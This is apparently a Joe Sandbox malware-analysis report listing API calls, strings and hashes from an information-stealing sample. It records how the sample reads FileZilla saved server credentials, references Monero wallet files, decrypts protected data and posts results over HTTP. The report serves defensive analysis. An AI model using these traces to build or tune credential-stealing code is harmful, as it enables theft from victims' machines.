                          • Opcode ID: 966422e7eef111bb95e54303ed787e323328b539dfe27a01b47643bf5638e217
                          • Instruction ID: 73b09508e4eef832a50d63ee8dd50f17dfbf2428f8ab5d2ed1c97dae3d764697
                          • Opcode Fuzzy Hash: 966422e7eef111bb95e54303ed787e323328b539dfe27a01b47643bf5638e217
                          • Instruction Fuzzy Hash: 78B2B0F390C2149FE3046F29EC8566AFBE9EF94720F16492DEAC4C3744EA7558408B97
                          APIs
                          • CoCreateInstance.COMBASE(00B0E118,00000000,00000001,00B0E108,00000000), ref: 00B03758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00B037B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: b6deb2affac278be5ad6f26e274f7985b210cefc0e9be722d2369844464274b9
                          • Instruction ID: e0acaa7602fd11a2531d2cb2a66861699c7bf1b428b0103c949891a5d5f13462
                          • Opcode Fuzzy Hash: b6deb2affac278be5ad6f26e274f7985b210cefc0e9be722d2369844464274b9
                          • Instruction Fuzzy Hash: D241EC70A40A189FDB24DB58CC99B9BB7B5BB48702F4081D8E618E72D0D771AE85CF50
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AF9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00AF9BA3
                          • LocalFree.KERNEL32(?), ref: 00AF9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 18ed1db4e84f072b1bd0f16f562a6b2d3ec76ff93d7a09d4ea7c57e91428d63d
                          • Instruction ID: 90d5014fe1ac82f6dbea656fd2528fdc52bc67293b19a055d801d3cb9e559927
                          • Opcode Fuzzy Hash: 18ed1db4e84f072b1bd0f16f562a6b2d3ec76ff93d7a09d4ea7c57e91428d63d
                          • Instruction Fuzzy Hash: 5911B7B8A00209EFDB04DF98D985AAE77B5FF88300F104598F915A7350D770AE10CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: q}_$ti=^
                          • API String ID: 0-1235932989
                          • Opcode ID: b701d99083ccffd0c500442726ce9b698755f98d9671e626bbf95810d9130c98
                          • Instruction ID: 17ba3dd125ba54e1590a60ca6eaf7b3f790afa87759a604ccb5869e38c02b476
                          • Opcode Fuzzy Hash: b701d99083ccffd0c500442726ce9b698755f98d9671e626bbf95810d9130c98
                          • Instruction Fuzzy Hash: 5E8219F360C2149FE3046E2DEC8567ABBE9EF94720F16463DEAC4C3744EA3598058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: E?_
                          • API String ID: 0-4261685252
                          • Opcode ID: ac02563b6c55904dc819477dc8af34752558e0faae8c6c7438662a5602f8cbbe
                          • Instruction ID: c57090381168d564de6be1bf0cb20de8e2c7786403e86d9a9e3b78f4fb9f806c
                          • Opcode Fuzzy Hash: ac02563b6c55904dc819477dc8af34752558e0faae8c6c7438662a5602f8cbbe
                          • Instruction Fuzzy Hash: CA9206F390C2009FE704AE28DC8567AB7E5EF94720F1A493DEAC5D3744E63598048797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6lw
                          • API String ID: 0-3761701750
                          • Opcode ID: a9fd1c7c11ac48c6c8b7b5d162177fe379cbc2ef5319d1d8989407f1f561985f
                          • Instruction ID: 7dc4cff1d53ea266acf285ac39b7bb79c31f15829b6482a0c94c1231d3c443dc
                          • Opcode Fuzzy Hash: a9fd1c7c11ac48c6c8b7b5d162177fe379cbc2ef5319d1d8989407f1f561985f
                          • Instruction Fuzzy Hash: 893229F3608200AFE3046E2DED8577AFBE9EF94360F1A493DE6C4C7744E63598058692
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: QYfw
                          • API String ID: 0-3428747866
                          • Opcode ID: 5dd0e4b5f5223a6f497793574949055427c1ce299db59eb3c3ae51bc169bd30b
                          • Instruction ID: 53c1cd12d8fc0c48f6b9a19efe77e219191ca0654fb42d2a5794579badc210e7
                          • Opcode Fuzzy Hash: 5dd0e4b5f5223a6f497793574949055427c1ce299db59eb3c3ae51bc169bd30b
                          • Instruction Fuzzy Hash: 5F51F4B3A082045FF344AE79DC857BBBBD6EBD4720F1B853DDAC883740E97958058692
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00B10DBA,00B10DB7,00B10DB6,00B10DB3), ref: 00B00362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B00369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B00385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B003CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B003DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00B00419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B00463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B0051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B0054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00B00562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00B00571
                          • lstrcat.KERNEL32(?,url: ), ref: 00B00580
                          • lstrcat.KERNEL32(?,00000000), ref: 00B00593
                          • lstrcat.KERNEL32(?,00B11678), ref: 00B005A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00B005B5
                          • lstrcat.KERNEL32(?,00B1167C), ref: 00B005C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00B005D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00B005E6
                          • lstrcat.KERNEL32(?,00B11688), ref: 00B005F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00B00604
                          • lstrcat.KERNEL32(?,00000000), ref: 00B00617
                          • lstrcat.KERNEL32(?,00B11698), ref: 00B00626
                          • lstrcat.KERNEL32(?,00B1169C), ref: 00B00635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B0068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AF59F8
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,018AFD00,00000000,?,018AE8F0,00000000,?,00B11A1C), ref: 00AF5E71
                          • lstrlen.KERNEL32(00000000), ref: 00AF5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AF5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00AF5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00AF5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AF5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00AF5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AF5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00AF5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00AF5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00AF5FBD
                          • HttpOpenRequestA.WININET(00000000,018AFBF0,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF5BF8
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00AF5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFCF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AFD0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AFD0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD208
                          • lstrcat.KERNEL32(?,00B11478), ref: 00AFD217
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD22A
                          • lstrcat.KERNEL32(?,00B1147C), ref: 00AFD239
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD24C
                          • lstrcat.KERNEL32(?,00B11480), ref: 00AFD25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD26E
                          • lstrcat.KERNEL32(?,00B11484), ref: 00AFD27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD290
                          • lstrcat.KERNEL32(?,00B11488), ref: 00AFD29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD2B2
                          • lstrcat.KERNEL32(?,00B1148C), ref: 00AFD2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD2D4
                          • lstrcat.KERNEL32(?,00B11490), ref: 00AFD2E3
                            • Part of subcall function 00B0A820: lstrlen.KERNEL32(00AF4F05,?,?,00AF4F05,00B10DDE), ref: 00B0A82B
                            • Part of subcall function 00B0A820: lstrcpy.KERNEL32(00B10DDE,00000000), ref: 00B0A885
                          • lstrlen.KERNEL32(?), ref: 00AFD32A
                          • lstrlen.KERNEL32(?), ref: 00AFD339
                            • Part of subcall function 00B0AA70: StrCmpCA.SHLWAPI(018A8AB8,00AFA7A7,?,00AFA7A7,018A8AB8), ref: 00B0AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFD3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 58da37aa97251d9fc90e3a0c996852435ae42512281692d045480689906aa207
                          • Instruction ID: 1b27a91aef533b5de01e44638323175271823392d9ffab1e6dba442190303845
                          • Opcode Fuzzy Hash: 58da37aa97251d9fc90e3a0c996852435ae42512281692d045480689906aa207
                          • Instruction Fuzzy Hash: 6DE10D71A10308ABCB04EBA4DD96EEE77B8AF14301F504598F147B61E1DE35AE45CB72
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
